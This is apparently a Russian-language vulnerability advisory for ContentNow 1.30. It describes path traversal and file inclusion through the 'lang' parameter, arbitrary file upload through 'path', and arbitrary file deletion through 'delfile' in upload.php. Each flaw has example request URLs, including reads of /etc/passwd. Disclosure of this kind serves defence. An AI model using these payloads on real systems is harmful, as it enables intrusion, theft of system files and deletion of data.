Хакер #305. Многошаговые SQL-инъекции
Программа: ContentNow 1.30
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" в сценарии includes/logger_engine.php. Удаленный пользователь может получить конфиденциальную информацию на целевой системе.
Пример:
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценарии upload.php. Удаленный пользователь может подгружать произвольные файлы.
Пример:
http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en
set path to equal dir location:
/ = root path
Select file, then upload it.
3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценарии upload.php. Удаленный пользователь может удалять произвольные файлы.
Пример:
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
set path to equal dir location:
/ = root path
set delfile for file you want to delete:
q.php